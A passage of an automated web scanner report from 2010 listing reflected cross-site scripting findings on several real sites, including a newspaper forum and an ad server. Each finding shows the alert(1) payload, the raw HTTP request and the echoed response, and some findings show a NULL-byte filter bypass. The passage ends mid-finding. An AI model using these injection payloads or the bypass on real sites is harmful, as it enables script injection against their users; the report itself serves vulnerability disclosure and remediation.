Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d467a"-alert(1)-"03e35f549b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d467a"-alert(1)-"03e35f549b3=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 07 Dec 2010 23:22:37 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=2e0950b18f0a572e7481e5cde043e951; expires=Fri, 31 Dec 2010 02:55:57 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:23:01 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 50791
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56572"-alert(1)-"621f5ac4ac2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums56572"-alert(1)-"621f5ac4ac2/forum/673 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:23:38 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ec1c09332ac64b0fae804f497fbfbb01; expires=Fri, 31 Dec 2010 02:56:58 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:24:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22005
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %006668f"-alert(1)-"f958950ecdc was submitted in the REST URL parameter 2. This input was echoed as 6668f"-alert(1)-"f958950ecdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum%006668f"-alert(1)-"f958950ecdc/673 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:23:52 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=297d55a81cf374e982219cba8d6b899a; expires=Fri, 31 Dec 2010 02:57:12 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:24:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21961
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %007404b"-alert(1)-"cb08f69ef9b was submitted in the REST URL parameter 3. This input was echoed as 7404b"-alert(1)-"cb08f69ef9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum/673%007404b"-alert(1)-"cb08f69ef9b HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:24:10 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=4590668b3373517d1e43091bd1b5ab3d; expires=Fri, 31 Dec 2010 02:57:30 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:24:34 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21961
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e08f7"-alert(1)-"5560a98aa55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumse08f7"-alert(1)-"5560a98aa55/poll HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:23:16 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=3b738ddcb7ec5f357dbd9a144257d329; expires=Fri, 31 Dec 2010 02:56:36 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:23:40 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21993
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c9c0e"-alert(1)-"a62518d6b65 was submitted in the REST URL parameter 2. This input was echoed as c9c0e"-alert(1)-"a62518d6b65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/poll%00c9c0e"-alert(1)-"a62518d6b65 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:23:31 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=2d85e4ba2b8771b61f67c399df560935; expires=Fri, 31 Dec 2010 02:56:51 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:23:55 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21956
The value of the lpip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bc23'%3balert(1)//d59b1e8fa8c was submitted in the lpip parameter. This input was echoed as 5bc23';alert(1)//d59b1e8fa8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tracking202/static/landing.php?lpip=71965bc23'%3balert(1)//d59b1e8fa8c HTTP/1.1 Host: gmtrx.com Proxy-Connection: keep-alive Referer: http://weekly-consumer-tips.com/?&t202id=bng&t202kw=news&c3=dp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 07 Dec 2010 23:05:42 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Content-Length: 3175 Connection: close Content-Type: text/html
function t202Init(){ //this grabs the t202kw, but if they set a forced kw, this will be replaced
if (readCookie('t202forcedkw')) { var t202kw = readCookie('t202forcedkw'); } else { var t202kw = t202GetVar('t202kw'); }
var lpip = '71965bc23';alert(1)//d59b1e8fa8c'; var t202id = t202GetVar('t202id'); var OVRAW = t202GetVar('OVRAW'); var OVKEY = t202GetVar('OVKEY'); var OVMTC = t202GetVar('OVMTC'); var c1 = t202GetVar('c1'); var c2 = t202GetVar('c2'); var ...[SNIP]...
4.34. http://gmtrx.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gmtrx.com
Path:
/tracking202/static/landing.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3479e'%3balert(1)//645efb88a9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3479e';alert(1)//645efb88a9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tracking202/static/landing.php?lpip=/3479e'%3balert(1)//645efb88a9c7196 HTTP/1.1 Host: gmtrx.com Proxy-Connection: keep-alive Referer: http://weekly-consumer-tips.com/?&t202id=bng&t202kw=news&c3=dp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 07 Dec 2010 23:05:47 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Content-Length: 3176 Connection: close Content-Type: text/html
function t202Init(){ //this grabs the t202kw, but if they set a forced kw, this will be replaced
if (readCookie('t202forcedkw')) { var t202kw = readCookie('t202forcedkw'); } else { var t202kw = t202GetVar('t202kw'); }
var lpip = '/3479e';alert(1)//645efb88a9c7196'; var t202id = t202GetVar('t202id'); var OVRAW = t202GetVar('OVRAW'); var OVKEY = t202GetVar('OVKEY'); var OVMTC = t202GetVar('OVMTC'); var c1 = t202GetVar('c1'); var c2 = t202GetVar('c2');
The value of the VS_cookie request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 160fe"-alert(1)-"b4a8432313a was submitted in the VS_cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA160fe"-alert(1)-"b4a8432313a&cg5=IPOS&customer_indicator=N&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:47 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C95"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA160fe"-alert(1)-"b4a8432313a&referrer=&searchterm="; /* var img = document.createElement('img'); img.width=1; img.height=1; img.style.display='none'; img.src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&in ...[SNIP]...
The value of the VS_cookie request parameter is copied into a JavaScript inline comment. The payload ccf2f*/alert(1)//13e87fd3ac was submitted in the VS_cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAAccf2f*/alert(1)//13e87fd3ac&cg5=IPOS&customer_indicator=N&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:47 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C96"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus ...[SNIP]... ne'; img2.src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAAccf2f*/alert(1)//13e87fd3ac&referrer=&searchterm='; document.body.insertBefore(img2,document.body.firstChild); */ var xp1_qs = "&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9 ...[SNIP]...
The value of the cg5 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e6e4"-alert(1)-"d85695b437b was submitted in the cg5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS1e6e4"-alert(1)-"d85695b437b&customer_indicator=N&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:48 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C94"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS1e6e4"-alert(1)-"d85695b437b&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm=";
/* var img = document.createElement('img'); img.width=1; img.height=1; img.style.display='none'; img.src='http://http ...[SNIP]...
The value of the cg5 request parameter is copied into a JavaScript inline comment. The payload 1759e*/alert(1)//278eb7141d4 was submitted in the cg5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS1759e*/alert(1)//278eb7141d4&customer_indicator=N&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:48 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C91"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus ...[SNIP]... img'); img2.width=1; img2.height=1; img2.style.display='none'; img2.src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N&cg5=IPOS1759e*/alert(1)//278eb7141d4&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm='; document.body.insertBefore(img2,document.body.firstChild); */ var xp1_qs = "&paidornatural=&testcell=&customer_indicat ...[SNIP]...
The value of the customer_indicator request parameter is copied into a JavaScript inline comment. The payload 41c97*/alert(1)//d4d04b19740 was submitted in the customer_indicator parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=N41c97*/alert(1)//d4d04b19740&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:49 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C92"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus ...[SNIP]... Element('img'); img2.width=1; img2.height=1; img2.style.display='none'; img2.src='http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=N41c97*/alert(1)//d4d04b19740&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm='; document.body.insertBefore(img2,document.body.firstChild); */ var xp1_qs = "&paidornatural=&testcell=&custome ...[SNIP]...
The value of the customer_indicator request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0917"-alert(1)-"0105602e2ba was submitted in the customer_indicator parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=Nd0917"-alert(1)-"0105602e2ba&referrer=&paidornatural=&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:48 GMT Connection: close
var xp_i1 = new Image(); var xp_i2 = new Image(); xp_i1.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-0224-001&intr=C93"; xp_i2.src = "http://http300.edge.ru4.com/smartserve/ttplus?placement=tp-1525-015&multi&paidornatural=&testcell=&customer_indicator=Nd0917"-alert(1)-"0105602e2ba&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm=";
/* var img = document.createElement('img'); img.width=1; img.height=1; img.style.display='none'; img.src='ht ...[SNIP]...
The value of the paidornatural request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3c41"-alert(1)-"617f75f91bd was submitted in the paidornatural parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smartserve/ad?placement=pt-2576-003&invocation=1000&VS_cookie=CA9A14180625EFAA&cg5=IPOS&customer_indicator=N&referrer=&paidornatural=f3c41"-alert(1)-"617f75f91bd&searchterm=&random=10748355.416581035 HTTP/1.1 Host: http300.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/lp/interest-plus-online-savings-account/bluemosaic.php?itc=CAPITALONE11123PINTMKTGDF&number=D-fkxyq3cLcx6Ure8NAnH&external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ru4.optout=true; X1ID=CC-00000000320688809; O62795=0; O15599=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://http300.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA" Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Content-Type: text/html Date: Tue, 07 Dec 2010 23:04:49 GMT Connection: close
var xp1 = "&paidornatural=f3c41"-alert(1)-"617f75f91bd&testcell=&customer_indicator=N&cg5=IPOS&destination=&source=&location=&VS_cookie=CA9A14180625EFAA&referrer=&searchterm="; var xp1_qs = "&paidornatural=f3c41"-alert(1)-"617f75f91bd&testcell=&customer_i ...[SNIP]...
The value of the referrer request parameter is copied into a JavaScript inline comment. The payload fbd00*/alert(1)//48573649511 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
